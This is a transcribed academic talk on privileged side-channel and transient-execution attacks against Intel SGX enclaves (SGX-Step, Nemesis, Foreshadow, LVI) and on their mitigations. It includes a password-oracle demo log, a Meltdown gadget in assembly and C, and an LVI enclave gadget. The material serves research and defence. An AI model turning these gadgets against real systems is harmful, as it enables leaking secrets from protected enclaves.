### Microarchitectural Side-Channel Attacks for Privileged Software Adversaries

Jo Van Bulck

STM PhD Award Talk (online), October 8, 2021

imec-DistriNet, KU Leuven | jo.vanbulck@cs.kuleuven.be | jovanbulck



"Complexity is the worst enemy of security, and our systems are getting more complex all the time."

- Bruce Schneier



https://informationisbeautiful.net/visualizations/million-lines-of-code/



#### Enclaved execution: Reducing attack surface



Traditional layered designs: large trusted computing base

#### Enclaved execution: Reducing attack surface



Intel SGX promise: hardware-level isolation and attestation

#### Enclaved execution: Privileged side-channel attacks



**Game-changer:** Untrusted OS  $\rightarrow$  new class of powerful side channels!





#### Evolution of "side-channel attack" research



Based on github.com/Pold87/academic-keyword-occurrence and xkcd.com/1938/


#### Side-channel attacks and trusted computing (focus of this PhD)



Based on github.com/Pold87/academic-keyword-occurrence and xkcd.com/1938/



1. Which novel privileged side channels exist?
   → We uncover previously unknown attack avenues
2. How well can they be exploited in practice?
   → We develop new techniques and practical attack frameworks
3. What can be leaked?
   → We leak metadata and data



# Idea 1: Privileged interrupts for side-channel amplification
Overall execution time reveals correctness of individual password bytes!

#### Building the side-channel oracle with execution timing?

**Too noisy:** modern x86 processors are lightning fast...



#### Analogy: Studying galloping horse dynamics



https://en.wikipedia.org/wiki/Sallie_Gardner_at_a_Gallop



(Figure: Muybridge, "The Horse in Motion", automatic electro-photograph of "Sallie Gardner", owned by Leland Stanford, running at a 1.40 gait over the Palo Alto track, 19th June, 1878. Copyright 1878 by Muybridge; Morse's Gallery, 417 Montgomery St., San Francisco.)



https://github.com/jovanbulck/sgx-step










#### SGX-Step: Executing enclaves one instruction at a time



#### Demo: Building a deterministic password oracle with SGX-Step

```
[idt.c] DTR.base=0xfffffe000000000/size=4095 (256 entries)
[idt.c] established user space IDT mapping at 0x7f7ff8e9a000
[idt.c] installed asm IRQ handler at 10:0x56312d19b000
[idt.c] IDT[ 45] @0x7f7ff8e9a2d0 = 0x56312d19b000 (seg sel 0x10): p=1: dpl=3: type=14: ist=0
[file.c] reading buffer from '/dev/cpu/1/msr' (size=8)
[apic.c] established local memory mapping for APIC BASE=0xfee00000 at 0x7f7ff8e99000
[apic.c] APIC ID=2000000: LVTT=400ec: TDCR=0
[apic.c] APIC timer one-shot mode with division 2 (lvtt=2d/tdcr=0)
[main.c] recovering password length
[attacker] steps=15: guess='******
[attacker] found pwd len = 6
[main.c] recovering password bytes
[attacker] steps=35; guess='SECRET' --> SUCCESS
[apic.c] Restored APIC LVTT=400ec/TDCR=0)
[file.c] writing buffer to '/dev/cpu/1/msr' (size=8)
[main.c] all done: counted 2260/2183 IRQs (AEP/IDT)
jo@breuer:~/sgx-step-demo$
```
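A model of the step-counting oracle behind both the timing slide and this demo, added here as an example (it is not code from the talk or from the sgx-step project): a hypothetical enclave password check is written in two variants, and `steps` stands in for the single-stepped instruction count an OS-level attacker reads off. The early-exit compare leaks how many leading bytes of a guess match; the constant-time variant returns the same count for every guess, which is the property a defender wants to verify.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not from the talk or sgx-step: a model of the single-stepped
 * password oracle. `steps` stands in for the instruction count an OS-level
 * attacker observes; PWD_LEN and SECRET are constructed sample values. */
#define PWD_LEN 6
static const uint8_t SECRET[PWD_LEN] = {'S', 'E', 'C', 'R', 'E', 'T'};

/* Leaky check: early exit, so the step count grows with the matching prefix. */
int leaky_check(const uint8_t *guess, size_t len, unsigned *steps)
{
    unsigned n = 0;
    if (len != PWD_LEN) { *steps = n; return 0; }   /* length also leaks */
    for (size_t i = 0; i < PWD_LEN; i++) {
        n++;                                         /* one step per byte */
        if (guess[i] != SECRET[i]) { *steps = n; return 0; }
    }
    *steps = n;
    return 1;
}

/* Hardened check: every byte is always touched and no branch depends on the
 * secret, so the step count is the same for every guess of any length. */
int ct_check(const uint8_t *guess, size_t len, unsigned *steps)
{
    unsigned n = 0;
    uint8_t diff = (uint8_t)(len != PWD_LEN);  /* length is public input */
    for (size_t i = 0; i < PWD_LEN; i++) {
        uint8_t g = (i < len) ? guess[i] : 0;    /* bounded by public len only */
        diff |= (uint8_t)(g ^ SECRET[i]);
        n++;
    }
    *steps = n;
    return diff == 0;
}

/* Spread of step counts over a set of equal-length guesses: 0 means a
 * step-counting adversary learns nothing about which bytes matched. */
unsigned step_spread(int (*check)(const uint8_t *, size_t, unsigned *),
                     const uint8_t guesses[][PWD_LEN], size_t n_guesses)
{
    unsigned lo = UINT_MAX, hi = 0;
    for (size_t k = 0; k < n_guesses; k++) {
        unsigned s = 0;
        check(guesses[k], PWD_LEN, &s);
        if (s < lo) lo = s;
        if (s > hi) hi = s;
    }
    return n_guesses ? hi - lo : 0;
}

int main(void)
{
    const uint8_t guesses[3][PWD_LEN] = {
        {'A', 'A', 'A', 'A', 'A', 'A'},  /* no byte matches     */
        {'S', 'E', 'A', 'A', 'A', 'A'},  /* 2-byte prefix match */
        {'S', 'E', 'C', 'R', 'E', 'T'},  /* the full secret     */
    };
    printf("leaky spread = %u, constant-time spread = %u\n",
           step_spread(leaky_check, guesses, 3),
           step_spread(ct_check, guesses, 3));
    return 0;
}
```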


Meme slide: "All your passwords are belong to us" (makeameme.org)

| Yr  | Attack           | Temporal resolution | APIC IRQ | APIC IPI | PTE #PF | PTE A/D | PTE PPN | Desc GDT | Desc IDT |
|-----|------------------|---------------------|----------|----------|---------|---------|---------|----------|----------|
| '15 | Ctrl channel     | ~ Page              | ○ | ○ | ● | ○ | ○ | ○ | ● |
| '16 | AsyncShock       | ~ Page              | ○ | ○ | ● | ○ | ○ | ○ | ○ |
| '17 | CacheZoom        | ✗ > 1               | ● | ○ | ○ | ○ | ○ | ○ | ○ |
| '17 | Hähnel et al.    | ✗ 0 - > 1           | ● | ○ | ○ | ○ | ○ | ○ | ● |
| '17 | BranchShadow     | ✗ 5 - 50            | ● | ○ | ○ | ○ | ○ | ○ | ○ |
| '17 | Stealthy PTE     | ~ Page              | ○ | ● | ○ | ● | ○ | ○ | ● |
| '17 | DarkROP          | ~ Page              | ○ | ○ | ● | ○ | ○ | ○ | ○ |
| '17 | SGX-Step         | ✓ 0 - 1             | ● | ○ | ● | ● | ○ | ○ | ○ |
| '18 | Off-limits       | ✓ 0 - 1             | ● | ○ | ● | ○ | ○ | ● | ○ |
| '18 | Single-trace RSA | ~ Page              | ○ | ○ | ● | ○ | ○ | ○ | ○ |
| '18 | Foreshadow       | ✓ 0 - 1             | ● | ○ | ● | ○ | ● | ○ | ○ |
| '18 | SgxPectre        | ~ Page              | ○ | ○ | ● | ○ | ○ | ○ | ○ |
| '18 | CacheQuote       | ✗ > 1               | ● | ○ | ○ | ○ | ○ | ○ | ○ |
| '18 | SGXlinger        | ✗ > 1               | ● | ○ | ○ | ○ | ○ | ○ | ○ |
| '18 | Nemesis          | ✓ 1                 | ● | ○ | ● | ● | ○ | ○ | ● |
| '19 | Spoiler          | ✓ 1                 | ● | ○ | ○ | ● | ○ | ○ | ● |
| '19 | ZombieLoad       | ✓ 0 - 1             | ● | ○ | ● | ● | ○ | ○ | ● |
| '19 | Tale of 2 worlds | ✓ 1                 | ● | ○ | ● | ● | ○ | ○ | ● |
| '19 | MicroScope       | ~ 0 - Page          | ○ | ○ | ● | ○ | ○ | ○ | ○ |
| '20 | Bluethunder      | ✓ 1                 | ● | ○ | ○ | ○ | ○ | ○ | ● |
| '20 | Big troubles     | ~ Page              | ○ | ○ | ● | ○ | ○ | ○ | ○ |
| '20 | Viral primitive  | ✓ 1                 | ● | ○ | ● | ● | ○ | ○ | ● |
| '20 | CopyCat          | ✓ 1                 | ● | ○ | ● | ● | ○ | ○ | ● |
| '20 | LVI              | ✓ 1                 | ● | ○ | ● | ● | ● | ○ | ● |
| '20 | A to Z           | ~ Page              | ○ | ○ | ● | ○ | ○ | ○ | ○ |
| '20 | Frontal          | ✓ 1                 | ● | ○ | ● | ● | ○ | ○ | ● |
| '20 | CrossTalk        | ✓ 1                 | ● | ○ | ● | ○ | ○ | ○ | ● |
| '20 | Online template  | ~ Page              | ○ | ○ | ● | ○ | ○ | ○ | ○ |
| '20 | Déjà Vu NSS      | ~ Page              | ○ | ○ | ● | ○ | ○ | ○ | ○ |



# Idea 2: Privileged interrupts for microarchitectural leakage

#### Elementary CPU behavior: Stored program computer



#### Back to basics: Fetch-decode-execute

Interrupts: Asynchronous events, handled on instruction retirement



#### Back to basics: Fetch-decode-execute

Timing leak: IRQ response time depends on current instruction(!)



#### Wait a cycle: Interrupt latency as a side channel



Meme slide: "Timing leaks everywhere" (imgflip.com)

### Nemesis attack: Inferring key strokes from Sancus enclaves



#### Enclave x-ray: Start-to-end trace enclaved execution

### Nemesis attack: Inferring key strokes from Sancus enclaves



#### Enclave x-ray: Keymap bit traversal (ground truth)

### Nemesis attack: Inferring key strokes from Sancus enclaves



#### Intel SGX microbenchmarks: Measuring x86 cache misses





(Plot: interrupt latency per instruction; x-axis: instruction (interrupt number))

### De-anonymizing SGX enclave lookups with interrupt latency

Adversary: Infer secret lookup in known sequence (e.g., DNA)






# Idea 3: Privileged page tables for transient data leakage

### Thesis outline: Privileged side channels (interrupt latency)



### Thesis outline: Privileged side channels (page-table accesses)



### Thesis outline: Transient-execution attacks (Foreshadow, LVI)



# WHAT IF I TOLD YOU

## **YOU CAN CHANGE RULES MID-GAME**

"The phantom trolley isn't supposed to touch anyone. It turns out you can still use it to do stuff. And it can drive through walls." (xkcd.com/1938)





#### Transient-execution attacks: Welcome to the world of fun!



#### The transient-execution zoo

#### https://transient.fail



#### **Unauthorized access**

Listing 1: x86 assembly.

```
meltdown:
    // %rdi: oracle
    // %rsi: secret_ptr

    movb (%rsi), %al
    shl  $0xc, %rax
    movq (%rdi, %rax), %rdi
    retq
```

Listing 2: C code.

```
void meltdown(uint8_t *oracle, uint8_t *secret_ptr)
{
    uint64_t v = *secret_ptr;   /* 64-bit, like %rax in Listing 1 */
    v = v * 0x1000;             /* one 4 KiB page per possible byte value */
    uint64_t o = oracle[v];
}
```





The build-up on the slides walks the gadget through four phases:

1. Unauthorized access: `movb (%rsi), %al` reads the secret byte.
2. Transient out-of-order window: before the fault is raised, the dependent load `movq (%rdi, %rax), %rdi` already touches `oracle[v * 0x1000]`.
3. Exception: the architectural state is discarded.
4. Exception handler: probing the oracle array reveals the entry indexed by the secret byte as a cache hit.








#### Rumors: Meltdown immunity for SGX enclaves?

# Meltdown melted down everything, except for one thing

"[enclaves] remain protected and completely secure"

— International Business Times, February 2018

ANJUNA'S SECURE-RUNTIME CAN PROTECT CRITICAL APPLICATIONS AGAINST THE MELTDOWN ATTACK USING ENCLAVES

"[enclave memory accesses] redirected to an abort page, which has no value" — Anjuna Security, Inc., March 2018

#### Rumors: Meltdown immunity for SGX enclaves?



SPECTRE-LIKE FLAW UNDERMINES INTEL PROCESSORS' MOST SECURE ELEMENT


I'M SURE THIS WON'T BE THE LAST SUCH PROBLEM —

# Intel's SGX blown wide open by, you guessed it, a speculative execution attack

Speculative execution attacks truly are the gift that keeps on giving.

https://wired.com and https://arstechnica.com





#### Building Foreshadow: Evade SGX abort page semantics






#### Foreshadow-SGX: Breaking enclave isolation



#### Foreshadow-NG: Breaking virtual machine isolation





#### Mitigating Foreshadow: Flush CPU microarchitecture

Intel SDM entry for the flush-command MSR:

| Register address (hex / dec) | Name | Bit | Description | Availability |
|---|---|---|---|---|
| 10BH / 267 | IA32_FLUSH_CMD | | Flush Command (WO). Gives software a way to invalidate structures with finer granularity than other architectural methods. | If any one of the enumeration conditions for defined bit field positions holds. |
| | | 0 | L1D_FLUSH: Writeback and invalidate the L1 data cache. | If CPUID.(EAX=07H,ECX=0):EDX[28]=1 |
| | | 63:1 | Reserved | |










#### Idea: Can we turn Foreshadow around?



#### Outside view

- Meltdown: out-of-reach
- Foreshadow: cache emptied



#### Intra-enclave view

- Access enclave + outside memory
- → Abuse in-enclave code gadgets!

#### Reviving Foreshadow & co. with Load Value Injection (LVI)




`Enclave/asm.S` from the sgx-step `app/lvi` demo, as shown in the editor on the slide:

```
.global ecall_lvi_sb_rop
# %rdi store_pt
# %rsi oracle_pt
ecall_lvi_sb_rop:
    mov %rsp, rsp_backup(%rip)
    lea page_b(%rip), %rsp
    add $OFFSET, %rsp

    /* transient delay */
    clflush dummy(%rip)
    mov dummy(%rip), %rax

    /* STORE TO USER ADRS */
    movq $'R', (%rdi)
    lea ret_gadget(%rip), %rax
    movq %rax, 8(%rdi)

    /* HIJACK TRUSTED LOAD FROM ENCLAVE STACK */
    /* should go to do_real_ret; will transiently go to ret_gadget if we fault o */
    pop %rax
#ifdef LFENCE
    notq (%rsp)
    notq (%rsp)
    lfence
    ret
#else
    ret
#endif

1:  jmp 1b
    mfence

do_real_ret:
    mov rsp_backup(%rip), %rsp
    ret
```

#### Mitigating LVI: Fencing vulnerable load instructions




#### Mitigating LVI: Compiler and assembler support



- GNU assembler: `-mlfence-after-load`
- LLVM: `-mlvi-hardening`
- MSVC: `-Qspectre-load`

- GNU Assembler Adds New Options For Mitigating Load Value Injection Attack (written by Michael Larabel in GNU on 11 March 2020)
- LLVM Lands Performance-Hitting Mitigation For Intel LVI Vulnerability (written by Michael Larabel in Software on 3 April 2020)
- More Spectre Mitigations in MSVC (March 13th, 2020)

#### Intel architectural enclaves: lfence counts

libsgx_qe.signed.so

- October 2019, "surgical precision": 23 fences
- March 2020, "big hammer"



- The Brutal Performance Impact From Mitigating The LVI Vulnerability (written by Michael Larabel in Software on 12 March 2020)
- Looking At The LVI Mitigation Impact On Intel Cascade Lake Refresh (written by Michael Larabel in Software on 5 April 2020)

- ⇒ **Trusted execution** environments (Intel SGX) ≠ perfect(!)
- ⇒ Importance of fundamental **side-channel research**; no silver-bullet defenses
- ⇒ Security **cross-cuts** the system stack: hardware, OS, compiler, application



